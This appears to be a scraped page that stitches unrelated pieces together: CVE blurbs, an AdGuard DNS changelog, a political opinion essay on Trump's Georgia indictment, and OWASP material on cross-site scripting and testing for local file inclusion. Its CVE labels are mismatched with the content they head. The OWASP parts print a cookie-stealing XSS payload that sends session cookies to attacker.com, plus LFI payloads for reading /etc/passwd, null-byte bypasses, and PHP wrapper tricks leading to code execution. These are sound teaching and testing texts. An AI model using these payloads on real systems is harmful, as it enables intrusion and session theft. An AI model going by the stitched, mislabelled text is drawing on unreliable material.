AdGuard DNS before 2.2 allows remote attackers to cause a denial of service via malformed UDP packets.

AdGuard DNS versions

2.2.1

Aug 7, 2023

In this update, we have improved the DNS server performance, fixed a few issues, and released a new authorization service that will allow users to access their personal account quicker.

Changelog

Performance

The number of AdGuard DNS users is growing at an enormous rate, and the total number of requests per second has closely approached 2 million. Meanwhile, over 90% of these requests come to us through encrypted DNS protocols (DoT, DoH, DoQ, DNSCrypt). Therefore, in this release, we focused on improving the DNS server’s performance and achieved great success. We can now handle an astronomical number of requests with reasonable server power.

Features

Added Czech and Slovak languages

Improved readability of highlighted text in dark theme #617

Full DNS address now displayed when setting up a device in a mobile browser #625

Fixes

Misalignment of columns when the “Device not connected” indicator dot appears #575

AdGuard verification code auto-fill issue with two-factor authentication enabled in Safari #314

Email address auto-fill bug on the login page in Safari #319

Incorrect functioning of the $dnsrewrite modifier

2.2

Apr 24, 2023

The highlight of this release is the ability to customize the Team subscription — now you can choose the number of devices, servers, and monthly requests you want before purchasing it. Also, we've added the option to select a response code for blocked requests and, of course, fixed some bugs.

Changelog

Features

Added the ability to customize the Team subscription

Added more information about monthly traffic update #490

Added the option to select a response code for blocked requests

Added AdGuard DNS blog

Updated Linked IP block design

Updated translations #570

Fixes

In the mobile version of Safari, the filtering log automatically reverts to its default state after scrolling

Problem with statistics and log retention settings #472

EDNS Client Subnet could not be disabled #542

Error condition is not reset when the type of line to be added is changed #563

Slashes are not saved in the comments of the user rules editor #576

Real-time query log updates don't retain filter changes #460

Fixed an issue that allowed a DoS attack against the service using malformed UDP packets

2.1.6

Mar 1, 2023

Minor bugs should be tackled before they build up and affect the performance of AdGuard DNS. We aim to release patches in a timely fashion, and here's another one.

Changelog

Fixed

Can't reach the 'Try AdGuard DNS' button in Safari on iOS #436

The settings of the selected server are reset after refreshing the page

The domain is not found in the search field if it was copy-pasted #530

Changed the hint text for clearing device logs/statistics #536

Added

Default TTL hint #535

Ability to customize which response will be used for a blocked domain

Option to block Mozilla canary domain

2.1.5

Feb 2, 2023

In this patch we've fixed several bugs — now AdGuard DNS runs better.

Changelog

Fixed

Spikes on the stat graph

Incorrect triggering of the device limit

Resetting statistics does not occur in all filter sections

Unable to log in to account via Apple ID if 2FA is enabled

Top blocked domains and top requested domains values in mobile version are mixed up #482

Resetting filters in filtering log does not clear domain search field #524

2.1.4

Dec 29, 2022

This patch is a little New Year’s present for you. We’ve significantly improved the performance of our DNS servers, added instructions for connecting AdGuard DNS to AdGuard VPN and AdGuard Browser extension, and fixed minor bugs.

2.1.3

Dec 7, 2022

Now it’s possible to connect an Android or iOS device with AdGuard VPN to AdGuard DNS via email. To do so:

Open the AdGuard DNS dashboard and tap the Connect new device button,

Choose Android or iOS and enter your device’s name,

Tap Next and then Send link by email,

Enter the email address you want to send the link to and click Send,

​​Open the email on the device you want to connect to AdGuard DNS and tap the Connect device button.

For this release we’ve also expanded the list of used filters, made some UI enhancements, fixed a few bugs, and added Vietnamese localization.

Added

Option to connect AdGuard DNS in the AdGuard VPN app by sending a configuration email

Vietnamese language support

Added filters

1Hosts (mini)

HaGeZi Personal Black & White

HUN: Hufilter

LIT: EasyList Lithuania

No Google

Fixed

AdGuard DNS homepage doesn’t load when iCloud+ Private Relay is enabled

2.1.2

Nov 22, 2022

In AdGuard DNS v2.1.2 we’ve enhanced the dashboard interface, added a server in Johannesburg and an option to disable automatic filtering log updates. Also, we’ve fixed some bugs so it will no longer be a problem to rename the device or understand the statistical report.

If you use AdGuard VPN for Android or iOS, you can easily add an encrypted DNS to your device. Just follow our instructions when adding a new device.

Added

Option to disable automatic filtering log updates #264

Johannesburg server

Turkish language support

Fixed

Flags were displayed incorrectly in the Traffic Direction section#428

Blank space in the Connection check section #431

Text started to glitch when renaming a device #354

Incorrect dates in the weekly stats report

2.1.1

Oct 25, 2022

This hotfix is intended to correct minor errors and add two localizations as a bonus.

Changelog

\[Enhancement\] Added translation of the dashboard and login page into Portuguese and Portuguese Brazilian

\[Fixed\] Incorrect time of latest device activity #427

\[Fixed\] Incorrect VPN subscription status #352

\[Fixed\] Refreshing the Device settings page redirects back to server settings #430

2.1

Oct 20, 2022

AdGuard DNS now supports DNS-over-HTTP/3 in experimental mode. It was a challenge, but we made it. For now only AdGuard Home and dnsproxy fully support DNS-over-HTTP/3, but soon DoH3 will appear in other AdGuard products. However, we focus on DNS-over-QUIC and consider it more advanced, but we strive to support the other protocols too, and DoH3 is a proof of that.

Another good news is that we will email AdGuard DNS users weekly and monthly reports with stats on requests, devices, and companies, which is convenient and visual. If there are too many reports, you can unsubscribe at any time.

Changelog

\[Enhancement\] Added the Apply button that appears after changing the server name

\[Enhancement\] Query log data cutoff in desktop mode #366

\[Enhancement\] Query log page numbers move when a new page is opened #368

\[Fixed\] Switching from 90 days to anything less causes dates to overlap #323

\[Fixed\] Text is cut off for the last domain in Top domains #339

\[Fixed\] Dates are cut off on the left and right side of the chart (mobile version of the website) #341

\[Fixed\] Misleading subscription status (from AdGuard VPN) #352

\[Fixed\] Wrong status of applied unblocking rules #361

\[Fixed\] The "Refresh" button on the homepage does not override the number of requests

\[Fixed\] Query log data is cut off (desktop version of the website) #366

\[Fixed\] Limit triggering in Enterprise plan

\[Fixed\] Can't scroll to account settings on Safari for macOS #353

\[Fixed\] In some cases the statistics were counted incorrectly

\[Fixed\] Top Destinations stats overlap when set to 90 days #326

2.0.1

Sep 7, 2022

It's been two weeks since the release of AdGuard DNS 2.0, but there's still a pleasant aftertaste. We've been painstakingly working on this product to give you a reliable and convenient tool to control your online traffic. And we succeeded.

Still, small bugs had crept into the release. That's why we're publishing a patch today: so you can enjoy the service, and we can move on to some bigger tasks with peace of mind.

Changelog

\[Enhancement\] Added search to the DNS knowledge base

\[Enhancement\] Updated link for Contact Us button on purchase page

\[Enhancement\] Improved the Traffic Destinations page

\[Enhancement\] Add an option to use add-cpe-id in Dnsmasq to identify the device

\[Fixed\] Disabling logs disables tariff statistics

\[Fixed\] Numbers in Japanese, Korean, Chinese are displayed incorrectly

2.0

Aug 18, 2022

The beta testing phase is finally over! From now on the new level of traffic control is available for you. With AdGuard DNS 2.0 you can:

Flexibly configure domain blocking via blocklists, query log and user rules;  

See real-time requests statistics from all connected devices;  

Enable and set up Parental control;  

Learn more about all the changes and improvements of AdGuard DNS 2.0 in our blog.

0.6

Jul 29, 2022

Check out the sixth beta version of AdGuard DNS (and hopefully the final one before the release). In it we’ve improved the dark theme: updated the map styles and QR-code, so that everything could be easily read and scanned. And, of course, we fixed some minor bugs. The private AdGuard DNS now runs smoother!

Changelog

\[Enhancement\] Updated map styles in the dark theme

\[Enhancement\] Added an option to disable iCloud Private Relay

\[Fixed\] QR code is not scanned in the dark theme

\[Fixed\] Autofill doesn’t work in Safari on macOS and iOS

\[Fixed\] Minor bug fixes in desktop и mobile versions

0.5

Jul 13, 2022

There are five fingers in a hand, five oceans on Earth, and five betas of the private AdGuard DNS. Today we're releasing the fifth beta of our DNS and we hope you'll rate it 5/5!

In this version we’ve implemented support for DDR (Discovery of Designated Resolvers) by the latest draft of the new standard. With this feature, an encrypted connection to the DNS server will be set up automatically on devices with DDR support, provided the device previously knew the server address. A computer or smartphone will send a request to the known address and receive all the necessary information to establish a secure connection.

DDR support appeared in Windows 11 Insider Preview Build 22489, which means that the feature will get into the release version after a while. When this happens, Windows and AdGuard DNS users will be automatically reconnected to encrypted DNS servers – public or private, depending on the services selected earlier.

We’ve also improved ECS (EDNS Client Subnet) implemented in the third beta. Servers now respond with more precise IP addresses that better match your location. Furthermore, we are continuing to refine the open AdGuard DNS API, and now there are methods for getting statistics. All documentation is available at Knowledge Base.

We’ve fixed some bugs and worked on the interface: authorization via Apple ID now works properly, the dark theme has become really dark, and the Query log is prettier than ever. French, Italian, Chinese, Japanese, and Korean were added to the dashboard, and we are committed to continue localizing the private AdGuard DNS, making it accessible to users from all over the world!

Changelog

\[Enhancement\] Added support for DDR (Discovery of Designated Resolvers)

\[Enhancement\] Statistic retrieval methods were added to the API

\[Enhancement\] Added an option to change subscription type

\[Enhancement\] Added an option to extend subscription

\[Enhancement\] Added support for Chinese, Japanese, Korean, French, and Italian

\[Enhancement\] Added the "Don’t ask again" checkbox to the system notification that appears when deleting user rules

\[Fixed\] After logging in via Apple ID the personal account opens instead of dashboard if the user has an AdGuard VPN subscription

\[Fixed\] In dark theme statistics blocks are highlighted in white

\[Fixed\] In dark theme text in some fields is grayed out

\[Fixed\] Some elements in the mobile version of the website are displayed incorrectly

0.4

Jun 21, 2022

The period of active "building" of the private AdGuard DNS is left behind, and now we're polishing the service to a shine. Just take a look at the current changelog and compare it to the one we published for the previous beta. The difference is obvious.

The fourth beta features dark theme and language selection – at the moment, the dashboard is translated into German, Spanish, and Russian. To find both options, go to Account settings. And some more good news: from now on all AdGuard VPN users with a subscription will get the Personal plan of the private AdGuard DNS for free.

We hope you’ll enjoy the new version. Use the service and leave feedback on any platform you like.

Changelog

\[Enhancement\] Added dark theme

\[Enhancement\] Added support for VPN subscriptions and information about VPN subscribers automatically getting a Personal DNS subscription

\[Enhancement\] Added German and Spanish localizations

\[Enhancement\] Improved search function in the filter section on mobile devices

\[Enhancement\] Supplemented instructions for different devices

\[Enhancement\] Added a link to DNS rules syntax in the query log dialog

\[Fixed\] The “View device settings” button doesn't work on iOS devices

\[Fixed\] The “Unable to renew subscription” popup hangs for too long

0.3.1

Jun 10, 2022

The recently released third beta of private AdGuard DNS was really good and brought a lot of useful features to users. However, as it turned out, it contained a few flaws. So that you don't have to deal with them anymore, we are releasing a patch v0.3.1 for private AdGuard DNS.

Changelog

\[Fixed\] Clicking the Block button in Query log deletes all existing user rules and replaces them with a new one #265

\[Fixed\] Unable to move devices between servers #248

\[Fixed\] Incorrect links on the "Thanks for your purchase" page

\[Fixed\] Discount promo codes do not work correctly

\[Fixed\] There is no payment button in the mobile version of the website

\[Fixed\] Incorrect designation of the number of requests in Statistics

0.3

May 26, 2022

Meet the third beta version of private AdGuard DNS! We are steadily moving towards a full-fledged product, adding new features, changing and improving UI — everything to make you really enjoy using AdGuard DNS.

The version history – in front of your eyes

First and foremost, we've added a version history page for the AdGuard DNS service. Now you can see the full list of changes, learn about new features, and see how the work on private AdGuard DNS service is progressing.

Contribute to AdGuard DNS translation

Until now, private AdGuard DNS could only be used in English: first we had to make sure everything was working as it should. With this version we've extended the geography by adding the possibility to translate the dashboard into different languages. Help us make AdGuard DNS more accessible to everyone by participating in the translations! You can find a detailed article on how to use the Crowdin platform in our Knowledge Base. And if you already know how to use it, visit the AdGuard DNS project in Crowdin. Select the Dashboard and choose the language you want, then you're ready to translate!

AdGuard DNS Knowledge Base

Subscription

We've added a paid subscription on private AdGuard DNS. Subscription is not required during beta testing, but we'd appreciate it if you'd like to support us now.

DNS filters

We've also fixed DNS filters: eliminated the bug with the /etc/hosts-style rules failing to work and added support for rules with $dnsrewrite. By the way, you can read about the DNS filtering syntax in the Knowledge Base.

ECS support

The AdGuard DNS servers now support EDNS Client Subnet (ECS).

This feature allows users to get responses corrected for the location of the DNS user. We had long been hesitating to implement it in AdGuard DNS: ECS assumes handing over an anonymized user's IP address to the name server. In this version, we've solved the problem: instead of the user's IP address, we pass another address from approximately the same location as the user's.

New blocklists

We've added a lot of new blocklists — now it's even easier to customize AdGuard DNS. And if that's not enough, you can request and add more blocklists in the GitHub repository (before you do that, read requirements for blocklists in the section “What Blocklists Can Be Added Here”).

Open API

AdGuard DNS now has an open API. If you want to integrate with AdGuard DNS, read the documentation.

UI fixes and more

We've also fixed a lot of minor bugs and added some useful features.

Test private AdGuard DNS and leave feedback on any convenient platforms — it will help us become better.

Changelog

\[Enhancement\] Improved the appearance of the multiselect (element with the ability to select multiple values, such as countries, devices)

\[Enhancement\] For the device location, the Traffic Destination section uses data from its last activity

\[Fixed\] Incorrect detection for account time zone

\[Fixed\] Statistics and logs do not get cleared when their retention period is changed

\[Fixed\] Incorrect country detection for some domains

\[Fixed\] Significant delay in clearing logs and statistics

\[Other\] Added the option "Last 7 days" to date selector

0.2

Mar 16, 2022

We’ve all been waiting for it: we're proud to present the open beta of private AdGuard DNS! From now on, anyone can set up their own DNS server.

We took the best of AdGuard DNS and AdGuard Home and designed a product that would be flexible and customizable, meet the needs of "geeks", and have a user-friendly interface. We hope we succeeded! And now let's take a closer look at the best features of private AdGuard DNS.

Block/unblock domains

With a private DNS server, it is only you who decides which domains should be blocked and which shouldn’t — on each device! Connect your computer, smartphone, tablet or router and manage their requests as desired.

Blocklists management

You can also choose which domain blocking rules should be implemented. And those who aren't satisfied with dozens of pre-installed blocklists can import and export their own custom rules.

Advanced statistics

Now you can see the full statistics of your requests: how many requests were registered, to which companies, and to which countries. Besides, you can view this information for different dates, countries, and even for different devices connected to your DNS server. And of course, block and unblock requests on the go.

Parental control

To protect your child from online content you deem inappropriate, you can use Parental control. You can activate the safe search and manually specify domains for blocking as well as set the schedule: for instance, not allow your child to watch videos during homework.

Join beta testing

To take part in beta testing go to AdGuard DNS website and press \*Join beta\*\*\*, then sign up or log into your AdGuard account. You're done! Create your own DNS server and manage your requests — you are in control.

0.1

Sep 28, 2021

Great news: AdGuard DNS is advancing to a new level. We're about to release the product that many have yearned for so long — the private AdGuard DNS!

What a public DNS server blocks cannot be changed — it only has to be taken for granted. With your own DNS server, you'll be in control of all the query statistics and be able to choose which domains you want to block. It'll allow you to add blocklists and set up Parental control. And the user-friendly interface will make it no problem to get to grips with it all.

We added a new website where you can already see what the private AdGuard DNS interface will look like, learn how to connect to the public DNS server, and subscribe to the AdGuard DNS newsletter. If you do, we'll message you at launch and keep you up-to-date with the latest AdGuard news.

Thank you for your support! Stay tuned — and in the meantime, we're working to make sure the next release is to your liking.

CVE-2023-41173: AdGuard DNS — ad-blocking DNS server

Improper authorization in handler for custom URL scheme issue in 'Skylark' App for Android  6.2.13 and earlier and 'Skylark' App for iOS 6.2.13 and earlier allows an attacker to lead a user to access an arbitrary website via another application installed on the user's device.

CVE-2023-40530

Social norms—not laws—are the underlying fabric of democracy. The Georgia indictment against Donald Trump is the last tool remaining to repair that which he’s torn apart.

Donald Trump was arrested in Georgia tonight for his role in what prosecutors christened “a wide-ranging criminal enterprise” aimed at overturning the results of the 2020 election. Trump and 18 others—among them, his former lawyer, Rudolph Giuliani, and Mark Meadows, his former chief of staff—have been formally accused of 41 state-law felonies. The case is brought by Fani Willis, the district attorney of Fulton County, Georgia. Willis is not the first local prosecutor to charge a United States president with a felony, but she is the first to accuse one of trying to steal an election.

Among charges such as filing false documents and conspiracy to commit forgery, Trump is personally accused of trying to browbeat and suborn felony acts from high-ranking Georgia officials, including the chief elections supervisor, secretary of state Brad Raffensperger. Officials were pressed by Trump and other “co-conspirators” to take action to “decertify the election” and “unlawfully appoint presidential electors,” prosecutors claim. Together, the charges opened the door for Willis to pile on additional counts of racketeering. Filed under the state’s Racketeer Influenced and Corrupt Organizations Act, the charge would ask jurors to consider whether Trump and other defendants were involved in a single criminal undertaking. A conviction under RICO does not require that the defendants all know one another or be involved at the same time, so long as they’re all working toward a single corrupt goal.

RICO, which can carry up to a 20-year prison sentence, is a powerful and even dangerous legal weapon. Out of dozens of possible crimes, a prosecutor may have to prove only two to gain a conviction. The state is fairly ambiguous about what constitutes an “enterprise.” Jurors, meanwhile, may be shown a veritable tower of evidence and instructed, usually in some narrative fashion, to see a “pattern” in the defendants’ acts; something the human brain is naturally wired to do, even at a subconscious level. For Trump and his team, allowing the case to progress to the point where a jury is actually deliberating RICO is a doomsday scenario.

In addition to the Georgia prosecution, the cases against Trump include one in Manhattan over “hush money” paid to a porn star; a case filed in Florida federal court over his retention of classified documents; and a federal case in Washington, DC, for his role in the January 6 insurrectionist riot at the US Capitol and efforts to overturn the 2020 election. In total, Trump is facing 91 felony charges. He has pleaded not guilty to each one so far.

The indictment is the culmination of a political career that Trump built by ignoring checks and balances, mocking the law and the courts, and cheering on supporters who use violence in his name, including groups rooted in white nationalism and misogyny, prone to spontaneous and premeditated violence. More than 1,100 of his most committed supporters have been charged in the past 31 months with trying to physically stop Congress from certifying the results of the 2020 election. More than 80 of them have pleaded guilty to beating police officers who had ordered them to disperse. More than 140 officers were reportedly injured, and four of those would die by suicide within 200 days of the event.

These are not Trump's only casualties. Legal experts have long warned that Trump's personal brand of politics—acrimonious, wielding tools of harassment—while deceptively trivial in the face of actual death, millions in damages, and election interference—is corrosive to the very norms and conventions upon which the electoral process has long relied for stability. Prosecuting Trump may help distinguish lawful challenges in future elections from outright criminal acts. But even alone, his arrest has already made clear what norm-breaking behaviors the public will not condone—not now or in the future, regardless of the courts' own views.

In a 2018 book, Harvard University duo Steven Levitsky and Daniel Ziblatt put forward two criteria for the foundation of a healthy democracy: “social norms,” or unwritten codes of conduct upon which the people generally agree. The Trump administration, by the end of its first year, had managed to violate both with a quotidian efficiency. Levitsky and Ziblatt’s norms included “mutual tolerance” and “institutional forbearance.” The latter describes the need for politicians to show restraint in the exercise of their authority; not to gain the upper hand and immediately use that power to obliterate one’s rivals. “Think of democracy as a game we want to keep playing indefinitely,” they write.

Nothing in this century has done more to stamp out the mutual toleration of Americans than the presidency of Donald Trump. His strategy of painting political rivals as illegitimate and un-American has—for the better part of a decade—chipped away at social and democratic norms that titans of jurisprudence have—for more than a century—called indispensable to a functioning democracy. By the time President Joe Biden took office, the _Washington Post_ had cataloged a decidedly pathological 30,000 false or misleading claims uttered by his predecessor. The Trump administration's ever-broadening palette of ethics violations caused Americans to realize, perhaps for the first time on a national scale, that truly there are few if any laws against some of the most basic forms of corruption; that, instead, conventions and norms—an honor system, essentially—is all that stand between presidents and the gross abuse of their power.

Americans typically point to the US Constitution as the pinnacle of their legal system. Many modern legal theorists, and even the nation’s own founders, painted the concept of state authority in a different light. The Genevan philosopher Rousseau considered _la volonté générale_, or the “general will” of the people, the only legitimate source of state power. American revolutionaries believed that only laws written with the “consent of the governed” could be considered legitimate. Thomas Jefferson once said the only “fountain of power” is the people, and that only “from them” is power derived. Regarding politicians who believe “supreme power” resides in constitutions, early US Supreme Court justice James Wilson suggested they had perhaps neglected to consider, “with sufficient accuracy, our political system.”

Consequently, democratic institutions are effectively incapable of restraining elected autocrats by their own volition. Without robust norms, traditional checks and balances often prove useless. “The tragic paradox of the electoral route to authoritarianism,” write Levitsky and Ziblatt, “is that democracy's assassins use the very institutions of democracy—gradually, subtly, and even legally—to kill it.” The Georgia case yanks Trump and his associates out of the squishy realm of “norms violations” and drops them into the cold, hard box of criminality. The best argument for prosecuting Trump under RICO is that it seemingly leaves jurors room to consider both.

The prosecutions of Trump will do nothing to cement America’s deep partisan divide, of course. Legal scholars reasonably believe it will only further inflame hostilities and erode trust in US institutions. Republicans have meanwhile launched an aggressive PR campaign based on the notion of “letting voters decide.” But relying on the vote, rather than jurors who are obligated to consider evidence and draw inferences from facts alone, could itself create a new norm anathema to democratic values. Prosecution was not the first choice. But every other lever that might’ve been pulled to stop and counteract the damage wrought by Trump was left in its place; particularly by Republicans, who’ve never actually been deprived of the means or opportunity to hold the de facto leader of their party accountable. Relying on the very system that Trump previously poured tens of millions of dollars into destroying feels otherwise, at best, like a nation fulfilling a death wish.

For American democracy to thrive, or retain any semblance of the legitimacy it has left, the prosecutorial systems, judges, and jurors in New York, Georgia, Florida, and Washington must grind forward. The law may not always prevent people from profiting off the wrongs they commit. But it cannot be denied outright the chance to decide whether they're stripped of their ill-gotten gains.

Laws are ultimately made “real” by the people against whom they’re imposed, including state officials, who, unlike private citizens, cannot scrape by merely obeying the law. Were judges, legislators, and even presidents to consider only themselves, ignoring the actions of their supervisors, subordinates, and peers, the validity of the legal system—and eventually the system itself—would fall apart. The English legal theorist H. L. A. Hart once wrote that among the "necessary and sufficient” criteria for the existence of a legal system is the requirement that public officials consciously adopt common standards of behavior and “appraise critically their own, and each other’s deviations as lapses.”

For some observers, the concept of "norms violations" during Trump's presidency became erroneously interlinked with the perceived failures of federal oversight officials, mostly by people unaware they were a phantom bulwark all along. A lack of coherence in the mainstays of democracy during Trump’s initial years left too many too focused on the absence of criminal charges, even though equally essential but far less defensible democratic norms were being whittled into dust. Where criminals have laws and courts to contend with, and are beyond the public’s own power to prosecute, social norms are injusticiable—outside the realm of the law, defined by people, their values, and beliefs.

And it’s no secret. The only fleshed-out directive revealed thus far to be implemented by Trump’s hypothetical follow-up presidency aims to see more than 50,000 bureaucrats and civil servants fired in an effort to insulate Trump from legal scrutiny and shield him from potential prosecution down the line. Groups of lobbyists have, according to Axios’ Jonathan Swan, already compiled their “extensive” lists of individuals believed loyal to the president and who fill those ranks instead. This plan is notably the opposite of the restraint on which Levitsky and Ziblatt place so much significance in the upkeep of a healthy and functioning democracy.

Trump’s Prosecution Is America’s Last Hope

IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.

OWASP Top Ten 2017

Threat Agents / Attack Vectors

Security Weakness

Impacts

App. Specific

Exploitability: 3

Prevalence: 3

Detectability: 3

Technical: 2

Business ?

Automated tools can detect and exploit all three forms of XSS, and there are freely available exploitation frameworks.

XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications.  
Automated tools can find some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET.

The impact of XSS is moderate for reflected and DOM XSS, and severe for stored XSS, with remote code execution on the victim’s browser, such as stealing credentials, sessions, or delivering malware to the victim.

Is the Application Vulnerable?

There are three forms of XSS, usually targeting users’ browsers:  
\* **Reflected XSS**: The application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.  
\* **Stored XSS**: The application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.  
\* **DOM XSS**: JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, the application would not send attacker-controllable data to unsafe JavaScript APIs.  
Typical XSS attacks include session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user’s browser such as malicious software downloads, key logging, and other client-side attacks.

How to Prevent

Preventing XSS requires separation of untrusted data from active browser content. This can be achieved by:  
\* Using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails, React JS. Learn the limitations of each framework’s XSS protection and appropriately handle the use cases which are not covered.  
\* Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The OWASP Cheat Sheet ‘XSS Prevention’ has details on the required data escaping techniques.  
\* Applying context-sensitive encoding when modifying the browser document on the client side acts against DOM XSS. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the OWASP Cheat Sheet ‘DOM based XSS Prevention’.  
\* Enabling a Content Security Policy (CSP) as a defense-in-depth mitigating control against XSS. It is effective if no other vulnerabilities exist that would allow placing malicious code via local file includes (e.g. path traversal overwrites or vulnerable libraries from permitted content delivery networks).  

Example Attack Scenarios

**Scenario #1**: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:  
**(String) page += "<input name='creditcard' type='TEXT'  
****value='" + request.getParameter("CC") + "'>";  
**The attacker modifies the ‘CC’ parameter in the browser to:  
**'><script>document.location=  
****'http://www.attacker.com/cgi-bin/cookie.cgi?  
****foo='+document.cookie</script>'.  
**This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.  
**Note**: Attackers can use XSS to defeat any automated Cross-Site Request Forgery (CSRF) defense the application might employ.

References

CVE-2023-39700: OWASP Top Ten 2017 | A7:2017-Cross-Site Scripting (XSS)

IceWarp Mail Server v10.4.5 was discovered to contain a local file inclusion (LFI) vulnerability via the component /calendar/minimizer/index.php. This vulnerability allows attackers to include or execute files from the local file system of the targeted server.

**Testing for Local File Inclusion****Summary**

The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to:

*   Code execution on the web server
*   Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
*   Denial of Service (DoS)
*   Sensitive Information Disclosure

Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

**How to Test**

Since LFI occurs when paths passed to include statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters.

Consider the following example:

http://vulnerable_host/preview.php?file=example.html

This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

Typical proof-of-concept would be to load passwd file:

http://vulnerable_host/preview.php?file=../../../../etc/passwd

If the above mentioned conditions are met, an attacker would see something like the following:

    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    alex:x:500:500:alex:/home/alex:/bin/bash
    margo:x:501:501::/home/margo:/bin/bash
    ...
    

Even when such a vulnerability exists, its exploitation could be more complex in real life scenarios. Consider the following piece of code:

    <?php include($_GET['file'].".php"); ?>
    

Simple substitution with a random filename would not work as the postfix .php is appended to the provided input. In order to bypass it, a tester can use several techniques to get the expected exploitation.

**Null Byte Injection**

The null character (also known as null terminator or null byte) is a control character with the value zero present in many character sets that is being used as a reserved character to mark the end of a string. Once used, any character after this special byte will be ignored. Commonly the way to inject this character would be with the URL encoded string %00 by appending it to the requested path. In our previous sample, performing a request to http://vulnerable_host/preview.php?file=../../../../etc/passwd%00 would ignore the .php extension being added to the input filename, returning to an attacker a list of basic users as a result of a successful exploitation.

**Path and Dot Truncation**

Most PHP installations have a filename limit of 4096 bytes. If any given filename is longer than that length, PHP simply truncates it, discarding any additional characters. Abusing this behavior makes it possible to make the PHP engine ignore the .php extension by moving it out of the 4096 bytes limit. When this happens, no error is triggered; the additional characters are simply dropped and PHP continues its execution normally.

This bypass would commonly be combined with other logic bypass strategies such as encoding part of the file path with Unicode encoding, the introduction of double encoding, or any other input that would still represent the valid desired filename.

**PHP Wrappers**

Local File Inclusion vulnerabilities are commonly seen as read only vulnerabilities that an attacker can use to read sensitive data from the server hosting the vulnerable application. However, in some specific implementations this vulnerability can be used to upgrade the attack from LFI to Remote Code Execution vulnerabilities that could potentially fully compromise the host.

This enhancement is common when an attacker could be able to combine the LFI vulnerability with certain PHP wrappers.

A wrapper is a code that surrounds other code to perform some added functionality. PHP implements many built-in wrappers to be used with file system functions. Once their usage is detected during the testing process of an application, it’s a good practice to try to abuse it to identify the real risk of the detected weakness(es). Below you can get a list with the most commonly used wrappers, even though you should consider that it is not exhaustive and at the same time it is possible to register custom wrappers that if employed by the target, would require a deeper ad hoc analysis.

**PHP Filter**

Used to access the local file system; this is a case insensitive wrapper that provides the capability to apply filters to a stream at the time of opening a file. This wrapper can be used to get content of a file preventing the server from executing it. For example, allowing an attacker to read the content of PHP files to get source code to identify sensitive information such as credentials or other exploitable vulnerabilities.

The wrapper can be used like php://filter/convert.base64-encode/resource=FILE where FILE is the file to retrieve. As a result of the usage of this execution, the content of the target file would be read, encoded to base64 (this is the step that prevents the execution server-side), and returned to the User-Agent.

**PHP ZIP**

On PHP 7.2.0, the zip:// wrapper was introduced to manipulate zip compressed files. This wrapper expects the following parameter structure: zip:///filename_path#internal_filename where filename_path is the path to the malicious file and internal_filename is the path where the malicious file is place inside the processed ZIP file. During the exploitation, it’s common that the # would be encoded with it’s URL Encoded value %23.

Abuse of this wrapper could allow an attacker to design a malicious ZIP file that could be uploaded to the server, for example as an avatar image or using any file upload system available on the target website (the php:zip:// wrapper does not require the zip file to have any specific extension) to be executed by the LFI vulnerability.

In order to test this vulnerability, the following procedure could be followed to attack the previous code example provided.

1.  Create the PHP file to be executed, for example with the content <?php phpinfo(); ?> and save it as code.php
2.  Compress it as a new ZIP file called target.zip
3.  Rename the target.zip file to target.jpg to bypass the extension validation and upload it to the target website as your avatar image.
4.  Supposing that the target.jpg file is stored locally on the server to the ../avatar/target.jpg path, exploit the vulnerability with the PHP ZIP wrapper by injecting the following payload to the vulnerable URL: zip://../avatar/target.jpg%23code (remember that %23 corresponds to #).

Since on our sample the .php extension is concatenated to our payload, the request to http://vulnerable_host/preview.php?file=zip://../avatar/target.jpg%23code will result in the execution of the code.php file existing in the malicious ZIP file.

**PHP Data**

Available since PHP 5.2.0, this wrapper expects the following usage: data://text/plain;base64,BASE64_STR where BASE64_STR is expected to be the Base64 encoded content of the file to be processed. It’s important to consider that this wrapper would only be avaliable if the option allow_url_include would be enabled.

In order to test the LFI using this wrapper, the code to be executed should be Base64 encoded, for example, the <?php phpinfo(); ?> code would be encoded as: PD9waHAgcGhwaW5mbygpOyA/Pg== so the payload would result as: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==.

**PHP Expect**

This wrapper, which is not enabled by default, provides access to processes stdio, stdout and stderr. Expecting to be used as expect://command the server would execute the provided command on BASH and return it’s result.

The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain an allow list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.

Check out the File Upload Cheat Sheet for good security practices on this topic.

*   kadimus
*   LFI Suite
